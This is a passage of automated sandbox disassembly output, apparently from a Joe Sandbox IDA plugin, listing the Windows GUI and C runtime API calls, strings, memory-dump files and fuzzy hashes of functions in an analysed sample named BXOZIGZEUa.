                                                                  • __EH_prolog3_catch.LIBCMT ref: 00217B21
                                                                    • Part of subcall function 0024EBDB: __EH_prolog3.LIBCMT ref: 0024EBE2
                                                                    • Part of subcall function 0024E8FE: __EH_prolog3.LIBCMT ref: 0024E905
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3$H_prolog3_catch
                                                                  • String ID: %sMDIClientArea-%d$MDITabsState
                                                                  • API String ID: 1670334802-353449602
                                                                  • Opcode ID: 68ca411dc97b5656e2b5b7e71e3578814924ecdd75f1d7ec5483f91ace2b62da
                                                                  • Instruction ID: 5834f0b773aa4b5d1061968e3676d5bd36004e80ead87705793b5f3b26235fe5
                                                                  • Opcode Fuzzy Hash: 68ca411dc97b5656e2b5b7e71e3578814924ecdd75f1d7ec5483f91ace2b62da
                                                                  • Instruction Fuzzy Hash: 57517C30914209EFCF05DFA4C885FEEBBB5AF65704F144089F11A67291CB719E94CBA2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: H.$h.
                                                                  • API String ID: 0-2090196884
                                                                  • Opcode ID: 05302d17bae80c408383f07241ff50dd253442adea26bfc72040be3cb171a748
                                                                  • Instruction ID: 6abebd667a385f8db633aa697857e185fa05fc581244cd3471edc6c3c75f33bb
                                                                  • Opcode Fuzzy Hash: 05302d17bae80c408383f07241ff50dd253442adea26bfc72040be3cb171a748
                                                                  • Instruction Fuzzy Hash: 8E417130300209AFDB258F15C888FBE77EAAF95710F294569FA5ACB2A0DB71DD418B51
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 001E385C
                                                                  • SystemParametersInfoW.USER32(00000026,00000000,?,00000000), ref: 001E38F9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: InfoParametersRectSystemWindow
                                                                  • String ID:
                                                                  • API String ID: 85510744-3916222277
                                                                  • Opcode ID: 9e222d3fbbe67edf6a6c37e6d35cb1c3815e1c692b6df54788956405f7bd3ed2
                                                                  • Instruction ID: 7fc94749d0e5661604de1fea8ab258c9b46eafe20a79806c445300f1c39c16f8
                                                                  • Opcode Fuzzy Hash: 9e222d3fbbe67edf6a6c37e6d35cb1c3815e1c692b6df54788956405f7bd3ed2
                                                                  • Instruction Fuzzy Hash: CD410E71900648EFCB25DF65C8889EEBBF5FF88350F10442EE85AA7251DB715A80DF50
                                                                  APIs
                                                                  • BringWindowToTop.USER32(00000000), ref: 002009BC
                                                                  • BringWindowToTop.USER32(00000000), ref: 002009C4
                                                                    • Part of subcall function 001DCBFE: GetWindowLongW.USER32(?,000000F0), ref: 001DCC09
                                                                    • Part of subcall function 001DCD55: ShowWindow.USER32(00000000,?,?,001CC2F5,00000000,00000000,00000363,00000001,00000000,00000001,00000001,?,00000000,00000363,00000001,00000000), ref: 001DCD66
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Bring$LongShow
                                                                  • String ID: X/
                                                                  • API String ID: 1322630393-1961195256
                                                                  • Opcode ID: 4e193138a49de107cf1083991929ccd3c0f65444ecb9c750a0e88b3f7fb3b0d3
                                                                  • Instruction ID: cd1fe03f75e09492c1209d1ce6b65b8e03f094185e109238c88474d2da04f27f
                                                                  • Opcode Fuzzy Hash: 4e193138a49de107cf1083991929ccd3c0f65444ecb9c750a0e88b3f7fb3b0d3
                                                                  • Instruction Fuzzy Hash: 00415C70B10209AFEF149FA4C896FBEB7B5AF58700F10406AF905EB291DB709C418F90
                                                                  APIs
                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 001C75B5
                                                                  • _memmove.LIBCMT ref: 001C7606
                                                                    • Part of subcall function 001C7450: std::_Xinvalid_argument.LIBCPMT ref: 001C746A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Xinvalid_argumentstd::_$_memmove
                                                                  • String ID: string too long
                                                                  • API String ID: 2168136238-2556327735
                                                                  • Opcode ID: 8114f32d5c08b50b3d98df9a25da16c723da25fde0e14f49ea2555819a144b0f
                                                                  • Instruction ID: 464dbc8c608f1949f4fb9fd80da57a9858ba272cde94d0cab60d0a6a1c2ec427
                                                                  • Opcode Fuzzy Hash: 8114f32d5c08b50b3d98df9a25da16c723da25fde0e14f49ea2555819a144b0f
                                                                  • Instruction Fuzzy Hash: 8D31C4323186104BD7259A5CA880E7AF7E9EFB5761B20092FF445C76C1C7A1DC408BA0
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 0021FE4B
                                                                  • KillTimer.USER32(?,00000002), ref: 0021FE7A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: KillRectTimerWindow
                                                                  • String ID:
                                                                  • API String ID: 1987732032-3916222277
                                                                  • Opcode ID: 0af0316b228d22db02e2ea36a0042cd715b3cb61822b8292c9ff2590135b197f
                                                                  • Instruction ID: c746baa65f612a979e4d21264da35c34f4d2f3081fddbfa2c488e74bbdf50c3f
                                                                  • Opcode Fuzzy Hash: 0af0316b228d22db02e2ea36a0042cd715b3cb61822b8292c9ff2590135b197f
                                                                  • Instruction Fuzzy Hash: B231A132A106059FCB50DF68D985AEEB7F5FF98310F21053EE42A97252DB74A891CF90
                                                                  APIs
                                                                  • _localeconv.LIBCMT ref: 001C6CFE
                                                                    • Part of subcall function 002BE0ED: __getptd.LIBCMT ref: 002BE0ED
                                                                    • Part of subcall function 002D8CA9: ____lc_handle_func.LIBCMT ref: 002D8CAC
                                                                    • Part of subcall function 002D8CA9: ____lc_codepage_func.LIBCMT ref: 002D8CB4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ____lc_codepage_func____lc_handle_func__getptd_localeconv
                                                                  • String ID: false$true
                                                                  • API String ID: 679402580-2658103896
                                                                  • Opcode ID: 5e903b02ad717ec0d8c6df1e7a63a36bfa963351193ca301ea0d2392b17cf5f7
                                                                  • Instruction ID: 4e9b4eb6714bfb7eda26d86bf4a5cb14847ee8fff80159f2b39e30f5ba70c7fd
                                                                  • Opcode Fuzzy Hash: 5e903b02ad717ec0d8c6df1e7a63a36bfa963351193ca301ea0d2392b17cf5f7
                                                                  • Instruction Fuzzy Hash: CB3146B1A257C0CBC715DFB49481BA6BBE4EF55300F14497ED5A68B302EB71E9088B71
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 001FA262
                                                                  • GetClientRect.USER32(?,?), ref: 001FA26F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$ClientWindow
                                                                  • String ID: 2
                                                                  • API String ID: 23228050-3001879987
                                                                  • Opcode ID: 9d8ee793663dab36d0c6ed12a10f083471a21592bdc88d190f39b80c8ee33830
                                                                  • Instruction ID: de94e49c1c650580c2ba7b17c7aa85833e9a17fee5072ea00e5825d1e304e7b6
                                                                  • Opcode Fuzzy Hash: 9d8ee793663dab36d0c6ed12a10f083471a21592bdc88d190f39b80c8ee33830
                                                                  • Instruction Fuzzy Hash: 3141E3B1A006099FCB11DFA9C984AFEFBF9FF88300F10051AE65AA3250DB316940DF61
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 001F645F
                                                                    • Part of subcall function 001D00D5: MoveToEx.GDI32(?,?,?,?), ref: 001D00FF
                                                                    • Part of subcall function 001D00D5: MoveToEx.GDI32(?,?,?,?), ref: 001D0110
                                                                    • Part of subcall function 001CFB68: MoveToEx.GDI32(?,?,?,00000000), ref: 001CFB85
                                                                    • Part of subcall function 001CFB68: LineTo.GDI32(?,?,?), ref: 001CFB94
                                                                    • Part of subcall function 001D06C9: SelectObject.GDI32(?,00000000), ref: 001D06EF
                                                                    • Part of subcall function 001D06C9: SelectObject.GDI32(?,?), ref: 001D0705
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Move$ObjectSelect$H_prolog3Line
                                                                  • String ID: iii$iii
                                                                  • API String ID: 3726201289-3499908146
                                                                  • Opcode ID: 3e95b3aa81eca78e6f4112aa241413089f2c1b0de202437a0bad2f724196ab8e
                                                                  • Instruction ID: 4121f1507d36bf6d9ddca370a58e21ca93d9f4156ea34352893b5ac3c10739c9
                                                                  • Opcode Fuzzy Hash: 3e95b3aa81eca78e6f4112aa241413089f2c1b0de202437a0bad2f724196ab8e
                                                                  • Instruction Fuzzy Hash: E4313075A0010AEFCF06EF94D951EEE7B7AAF68310F004029F911A72A1CB75DE21DB65
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen
                                                                  • String ID: 4y)$4y)
                                                                  • API String ID: 176396367-2445369525
                                                                  • Opcode ID: 8d9d0585275515b6b8752dac7c594bb602b68465ebc120bb42d6c3bc9616b8f2
                                                                  • Instruction ID: ab64f5f98b1cab809fe8276f4e274086ff91e7f7f32a402e33235fbaaa0dce88
                                                                  • Opcode Fuzzy Hash: 8d9d0585275515b6b8752dac7c594bb602b68465ebc120bb42d6c3bc9616b8f2
                                                                  • Instruction Fuzzy Hash: 94213733920217C7CB349F6CC8426B773B8EF537A0B188065E8469B192EB70DE59D350
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 001FB0E3
                                                                  • SetRect.USER32(?,?,?,?,?), ref: 001FB127
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Window
                                                                  • String ID: 2
                                                                  • API String ID: 924285169-3001879987
                                                                  • Opcode ID: 15800fc0cbae630a40c56cd4185f79da0c56662acb0854a18970aab2b91424c8
                                                                  • Instruction ID: f0671ff3ce4ddc1756a0067e4b38d5dfa9c7a48924e3a84acb74cbd4c3499516
                                                                  • Opcode Fuzzy Hash: 15800fc0cbae630a40c56cd4185f79da0c56662acb0854a18970aab2b91424c8
                                                                  • Instruction Fuzzy Hash: BA31EDB1D002089FCB10CFA9D9859EEFBF9FF88304B10856AE956E7215D770A9048FA0
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: EmptyH_prolog3_Rect
                                                                  • String ID: Afx:ToolBar
                                                                  • API String ID: 2941628838-177727192
                                                                  • Opcode ID: edca05fffe1ac271fcf9ecfce649451856f52111f6d8d6c637ed8f1b85949b83
                                                                  • Instruction ID: c1b7e4b6b72c512cdef96f94acb7f69d53edae36f9ce17fcda72218338299d6b
                                                                  • Opcode Fuzzy Hash: edca05fffe1ac271fcf9ecfce649451856f52111f6d8d6c637ed8f1b85949b83
                                                                  • Instruction Fuzzy Hash: 18218971A6065A9FCF04DFB4C886AEE7AE8FF58350F14052AF516E7280DB349D118BE0
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3Window
                                                                  • String ID: 83/
                                                                  • API String ID: 616115145-2323854675
                                                                  • Opcode ID: 9173e8d4ea7e9ed1abcf380bcbd41c2ad456fe4cd2d04b432e9a1df98f6a61f6
                                                                  • Instruction ID: 1760c6b363010575c03cebfe193526f443d2f8da23cf8c92a63eca795becf975
                                                                  • Opcode Fuzzy Hash: 9173e8d4ea7e9ed1abcf380bcbd41c2ad456fe4cd2d04b432e9a1df98f6a61f6
                                                                  • Instruction Fuzzy Hash: 2121F1307206119FCF06BFA4D84AAADB7F9BF98700F400169E505AF2A2DF708B118B91
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 001FCB5A
                                                                    • Part of subcall function 001DCC18: GetWindowLongW.USER32(?,000000EC), ref: 001DCC23
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3LongWindow
                                                                  • String ID: Afx:MiniFrame$2
                                                                  • API String ID: 92005281-2466283223
                                                                  • Opcode ID: a6e96f83c7d93d70d26309cff1814c31d4ae9774f95d351aa47c3f486f971e37
                                                                  • Instruction ID: b921a17f8c8befcdde0a51a6eee1fdf6b1490a92b66b6babd66f2c1c425b5bbc
                                                                  • Opcode Fuzzy Hash: a6e96f83c7d93d70d26309cff1814c31d4ae9774f95d351aa47c3f486f971e37
                                                                  • Instruction Fuzzy Hash: E221313021020D9BDB189F71C942FBA36A5EF94350F10012DBA1ACB2D0EB30DC21EBD0
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 002AA121
                                                                    • Part of subcall function 00297DE9: __EH_prolog3.LIBCMT ref: 00297DF0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3
                                                                  • String ID: X*1$dF/
                                                                  • API String ID: 431132790-3663479175
                                                                  • Opcode ID: 7c01fec51138dbbd60cccceebef365574460abfadb242d66c9d08f93807798c2
                                                                  • Instruction ID: 15436f41480d13979887808bff55913d0830ce304e0c93f73f2d5f500b940b9a
                                                                  • Opcode Fuzzy Hash: 7c01fec51138dbbd60cccceebef365574460abfadb242d66c9d08f93807798c2
                                                                  • Instruction Fuzzy Hash: 25319C74815B84DAD725EBB4C541BEFBBE0AF31315F10485DE1AB16282CFB42708CB26
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 001EE426
                                                                    • Part of subcall function 0024EBDB: __EH_prolog3.LIBCMT ref: 0024EBE2
                                                                    • Part of subcall function 0024E8FE: __EH_prolog3.LIBCMT ref: 0024E905
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
